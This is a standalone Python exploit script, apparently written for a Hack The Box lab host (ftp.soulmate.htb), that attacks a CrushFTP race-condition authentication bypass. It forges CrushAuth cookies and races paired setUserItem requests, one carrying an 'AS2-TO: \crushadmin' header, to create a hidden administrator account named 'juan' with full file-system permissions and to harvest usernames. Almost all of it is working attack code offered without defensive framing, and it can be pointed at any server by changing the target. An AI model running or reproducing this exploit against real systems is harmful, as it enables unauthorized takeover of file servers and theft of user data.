#!/usr/bin/env python3
import requests
import threading
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
import sys
import random
import string
# Generate random 4-character c2f value
def generate_random_c2f():
return ''.join(random.choices(string.ascii_letters + string.digits, k=4))
# Global variables for c2f and cookie management
C2F_VALUE = None
CRUSH_AUTH_COOKIE = None
def update_c2f_and_cookies():
"""Generate new c2f value and update cookies"""
global C2F_VALUE, CRUSH_AUTH_COOKIE
C2F_VALUE = generate_random_c2f()
CRUSH_AUTH_COOKIE = f"CrushAuth=1755657772315_Nr7FSH4jd2l6RueteEaaEDpY1CcdU{C2F_VALUE}; currentAuth={C2F_VALUE}"
print(f"[*] Generated new c2f value: {C2F_VALUE}")
# Initialize first c2f value
update_c2f_and_cookies()
def make_request_with_as2(target_url):
"""Make request with AS2-TO header and disposition-notification content type"""
url = f"{target_url}/WebInterface/function/"
headers = {
"Host": target_url.replace("http://", "").replace("https://", ""),
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"AS2-TO": "\crushadmin",
"Content-Type": "disposition-notification",
"X-Requested-With": "XMLHttpRequest",
"Cookie": CRUSH_AUTH_COOKIE
}
data = {
"command": "setUserItem",
"data_action": "replace",
"serverGroup": "MainUsers",
"username": "juan",
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
<user_name>juan</user_name>
<password>1234S.</password>
<extra_vfs type="vector"></extra_vfs>
<version>1.0</version>
<root_dir>/</root_dir>
<userVersion>6</userVersion>
<max_logins>0</max_logins>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
<created_by_username>crushadmin</created_by_username>
<created_by_email></created_by_email>
<created_time>{int(time.time() * 1000)}</created_time>
<password_history></password_history>
<admin>true</admin>
</user>''',
"xmlItem": "user",
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
"c2f": C2F_VALUE
}
try:
response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
return f"AS2 Request - Status: {response.status_code}", response.text
except Exception as e:
return f"AS2 Request - Error: {str(e)}", ""
def make_request_without_as2(target_url):
"""Make request without AS2-TO header and disposition-notification content type"""
url = f"{target_url}/WebInterface/function/"
headers = {
"Host": target_url.replace("http://", "").replace("https://", ""),
"User-Agent": "python-requests/2.32.3",
"Accept-Encoding": "gzip, deflate",
"Accept": "*/*",
"Connection": "keep-alive",
"X-Requested-With": "XMLHttpRequest",
"Cookie": CRUSH_AUTH_COOKIE
}
data = {
"command": "setUserItem",
"data_action": "replace",
"serverGroup": "MainUsers",
"username": "juan",
"user": f'''<?xml version="1.0" encoding="UTF-8"?>
<user type="properties">
<user_name>juan</user_name>
<password>1234S.</password>
<extra_vfs type="vector"></extra_vfs>
<version>1.0</version>
<root_dir>/</root_dir>
<userVersion>6</userVersion>
<max_logins>0</max_logins>
<site>(SITE_PASS)(SITE_DOT)(SITE_EMAILPASSWORD)(CONNECT)</site>
<created_by_username>crushadmin</created_by_username>
<created_by_email></created_by_email>
<created_time>{int(time.time() * 1000)}</created_time>
<password_history></password_history>
<admin>true</admin>
</user>''',
"xmlItem": "user",
"vfs_items": '<?xml version="1.0" encoding="UTF-8"?><vfs type="vector"></vfs>',
"permissions": '<?xml version="1.0" encoding="UTF-8"?><VFS type="properties"><item name="/">(read)(write)(view)(delete)(resume)(makedir)(deletedir)(rename)(admin)</item></VFS>',
"c2f": C2F_VALUE
}
try:
response = requests.post(url, headers=headers, data=data, verify=False, timeout=5)
return f"Regular Request - Status: {response.status_code}", response.text
except Exception as e:
return f"Regular Request - Error: {str(e)}", ""
def check_vulnerable_response(response_text):
"""Check if response contains user_list_subitem pattern and extract usernames"""
if "<user_list_subitem>" in response_text:
# Extract all usernames from user_list_subitem tags
import re
usernames = re.findall(r'<user_list_subitem>(.*?)</user_list_subitem>', response_text)
if usernames:
# Limit to top 10 users
top_users = usernames[:10]
print(f"[*] EXFILTRATED {len(top_users)} USERS: {', '.join(top_users)}")
return True
return False
def race_requests_with_detection(target_url, num_requests=1000):
"""Race multiple requests and detect vulnerability"""
print(f"Starting race with {num_requests} request pairs...")
print("=" * 60)
for i in range(num_requests):
# Generate new c2f every 100 requests
if i % 50 == 0:
update_c2f_and_cookies()
print(f"[*] NEW SESSION: c2f={C2F_VALUE}")
# Store results
results = {'as2': None, 'regular': None}
def as2_worker():
results['as2'] = make_request_with_as2(target_url)
def regular_worker():
results['regular'] = make_request_without_as2(target_url)
# Create and start threads
t1 = threading.Thread(target=as2_worker)
t2 = threading.Thread(target=regular_worker)
# Start both threads simultaneously
t1.start()
t2.start()
# Wait for both to complete
t1.join()
t2.join()
# Check for vulnerability in both responses
as2_status, as2_response = results['as2']
regular_status, regular_response = results['regular']
# Check if either response contains the user list pattern
if check_vulnerable_response(as2_response) or check_vulnerable_response(regular_response):
print("[*] VULNERABLE! RACE CONDITION POSSIBLE!")
return True
# Print progress every 100 requests
if (i + 1) % 50 == 0:
print(f"[*] PROGRESS: {i + 1}/{num_requests} request pairs completed...")
return False
def poc_attempt(target_url):
"""Main POC function with retry logic"""
total_requests = 5000
print("[*] CRUSHFTP RACE CONDITION POC")
print(f"[*] TARGET: {target_url}")
print("[*] ENDPOINT: CrushFTP WebInterface getUserList")
print(f"[*] ATTACK: {total_requests} requests with new c2f every 50 requests")
print("=" * 60)
# Try 5000 requests with new c2f every 50
if race_requests_with_detection(target_url, total_requests):
return True
print("[*] POC FAILED: Target appears to be patched or timing window missed")
return False
if __name__ == "__main__":
target_url = "http://ftp.soulmate.htb"
poc_attempt(target_url)